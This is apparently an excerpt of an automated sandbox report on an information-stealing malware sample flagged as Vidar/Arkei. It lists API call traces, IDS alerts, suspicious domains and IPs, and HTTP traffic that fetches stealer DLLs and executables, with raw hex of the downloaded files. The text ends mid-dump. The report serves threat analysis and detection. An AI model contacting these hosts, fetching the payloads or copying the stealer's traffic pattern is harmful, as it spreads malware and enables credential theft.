                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.4:49886 -> 78.46.160.87:80
                      Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49893 -> 141.8.192.58:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: github.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: raw.githubusercontent.com
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeDomain query: srtuiyhuali.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeDomain query: fufuiloirtu.com
                      Source: C:\Windows\explorer.exeDomain query: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: a0620531.xsph.ru
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: softwaresworld.net
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Source: C:\Windows\explorer.exeDomain query: unic11m.top
                      May check the online IP address of the machineShow sources
                      Source: unknownDNS query: name: iplogger.org
                      Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
                      Source: global trafficHTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d80 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: global trafficHTTP traffic detected: POST /565 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 78.46.160.87Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad31 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /htrrfwedsqw.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
                      Source: global trafficHTTP traffic detected: GET /c_setup.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
                      Source: global trafficHTTP traffic detected: GET /RMR.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:56 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:02 GMTContent-Type: application/x-msdos-programContent-Length: 312320Connection: closeLast-Modified: Tue, 11 Jan 2022 19:44:01 GMTETag: W/"4c400-5d553accb2fe1"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db e7 80 7e 9f 86 ee 2d 9f 86 ee 2d 9f 86 ee 2d 81 d4 7b 2d 88 86 ee 2d 81 d4 6d 2d 19 86 ee 2d 81 d4 6a 2d b1 86 ee 2d b8 40 95 2d 98 86 ee 2d 9f 86 ef 2d 12 86 ee 2d 81 d4 64 2d 9e 86 ee 2d 81 d4 7a 2d 9e 86 ee 2d 81 d4 7f 2d 9e 86 ee 2d 52 69 63 68 9f 86 ee 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1e a9 b3 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 18 01 00 00 26 04 00 00 00 00 00 d7 2e 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 d7 52 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 5d 01 00 50 00 00 00 00 80 04 00 50 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 50 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 23 16 01 00 00 10 00 00 00 18 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 37 00 00 00 30 01 00 00 38 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 01 03 00 00 70 01 00 00 a2 02 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 cd 00 00 00 80 04 00 00 ce 00 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:37 GMTContent-Type: application/x-msdos-programContent-Length: 590848Connection: closeLast-Modified: Sun, 09 Jan 2022 14:15:02 GMTETag: "90400-5d526d88d6301"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e 60 89 17 1a 01 e7 44 1a 01 e7 44 1a 01 e7 44 04 53 63 44 33 01 e7 44 04 53 72 44 07 01 e7 44 04 53 64 44 66 01 e7 44 3d c7 9c 44 1f 01 e7 44 1a 01 e6 44 92 01 e7 44 04 53 6d 44 1b 01 e7 44 04 53 73 44 1b 01 e7 44 04 53 76 44 1b 01 e7 44 52 69 63 68 1a 01 e7 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c 5f 9e 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ec 00 00 00 d4 7b 02 00 00 00 00 9f 1c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 ab a3 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 84 07 00 3c 00 00 00 00 50 7b 02 f8 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7c 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 ea 00 00 00 10 00 00 00 ec 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 8d 06 00 00 00 01 00 00 8e 06 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 ba 73 02 00 90 07 00 00 86 00 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 fe 00 00 00 50 7b 02 00 00 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:44:52 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 19:44:58 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 19:44:58 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 19:44:59 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 19:44:59 GMTCache-Control: max-age=86400X-Cache-Status: HITX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 